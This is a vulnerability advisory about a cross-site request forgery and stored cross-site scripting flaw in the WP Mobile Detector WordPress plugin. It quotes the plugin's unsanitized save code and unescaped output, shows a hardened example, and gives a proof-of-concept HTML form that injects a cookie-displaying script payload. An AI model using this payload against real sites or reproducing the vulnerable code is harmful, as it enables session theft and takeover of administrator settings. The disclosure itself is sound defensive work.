22 Jun

Cross-Site Request Forgery (CSRF)/Cross-Site Scripting (XSS) Vulnerability in WP Mobile Detector

As we continue looking at ways we can improve the security of WordPress plugins, one of the things we are trying is checking over plugins for which we have recently added new vulnerabilities to our data set, to see if we can find any other obvious vulnerabilities. The second one we have spotted is in the plugin WP Mobile Detector. Unlike the arbitrary file upload vulnerability we spotted after someone was looking to exploit it on this website, this cross-site request forgery (CSRF)/cross-site scripting (XSS) vulnerability on the settings page for the plugin is unlikely to be exploited.

The CSRF portion of this is due to a lack of a nonce on the page.

For the XSS issue, in the file /admin/admin-page.php the settings are saved and no sanitization is done on the submitted values:

foreach($_POST as $k=>$v){
	if(is_array($v)){
		foreach($v as $key=>$value){
			// every submitted array value is stored as-is, with no sanitization
			$websitez_options[$k][$key] = $value;
		}
	}
}
$options = serialize($websitez_options);

if(count($websitez_options) > 0){
	if(websitez_set_options($websitez_options)){

When the values are output on the page through the file /admin/themes.php they are not escaped. For example, the value for ['general']['posts_per_page'] is set on line 470:

470
<input type="text" id="posts_per_page" value="<?php echo $websitez_options['general']['posts_per_page']; ?>" />

Due to the use of a short open tag, <?, in one location in the file /admin/themes.php, the settings page will not load if short open tags are not enabled:

561
<? foreach($icons as $icon){ ?>
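As an added example (not the plugin's own code), here is how the save path and the output line above could be hardened: a nonce and capability check addresses the CSRF issue, a whitelist with per-field sanitization addresses the stored values, and esc_attr() escapes on output. The function names websitez_save_options_hardened and websitez_render_posts_per_page_field and the nonce action name websitez_save_options are assumptions; websitez_set_options() is the plugin function shown above.

```php
<?php
// Added example, not the plugin's code. Assumes WordPress core functions and the
// plugin's websitez_set_options(); the nonce action 'websitez_save_options' and
// the $allowed whitelist are assumptions for illustration.

// Only these option keys may be written; anything else in $_POST is ignored.
$allowed = array(
    'general' => array(
        'posts_per_page' => 'absint', // integer only
    ),
);

function websitez_save_options_hardened( array $post, array $allowed ) {
    // CSRF fix: the request must carry a valid nonce for this action and come
    // from a user allowed to change options. check_admin_referer() dies on failure.
    check_admin_referer( 'websitez_save_options', '_wpnonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions' );
    }

    $clean = array();
    foreach ( $allowed as $section => $fields ) {
        if ( empty( $post[ $section ] ) || ! is_array( $post[ $section ] ) ) {
            continue;
        }
        foreach ( $fields as $field => $sanitizer ) {
            if ( isset( $post[ $section ][ $field ] ) ) {
                // Input-side fix: each value goes through a type-appropriate
                // sanitizer before it is stored.
                $clean[ $section ][ $field ] = call_user_func( $sanitizer, $post[ $section ][ $field ] );
            }
        }
    }

    if ( count( $clean ) > 0 ) {
        return websitez_set_options( $clean );
    }
    return false;
}

// Output-side fix: escape on output regardless of what was stored, and emit the
// nonce field so the matching form submission passes check_admin_referer().
function websitez_render_posts_per_page_field( array $websitez_options ) {
    $value = isset( $websitez_options['general']['posts_per_page'] )
        ? $websitez_options['general']['posts_per_page'] : '';
    wp_nonce_field( 'websitez_save_options', '_wpnonce' );
    echo '<input type="text" id="posts_per_page" name="general[posts_per_page]" value="'
        . esc_attr( $value ) . '" />';
}
```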

Proof of Concept

The following proof of concept will cause an alert box with any accessible cookies to be shown on the Mobile Theme Settings page, /wp-admin/admin.php?page=websitez_themes.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="action" value="websitez_options" />
<input type="hidden" name="general[posts_per_page]" value=':"><script>alert(document.cookie);</script>' />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • 6/15/2016 – Developer notified.
  • 6/22/2016 – WordPress.org Plugin Directory notified.
  • 6/28/2016 – Removed from Plugin Directory.

Concerned About The Security of The Plugins You Use?

When you are a paying customer of our service (you can currently try the service free for the first month), you get to suggest/vote on what plugins we will do security reviews of.
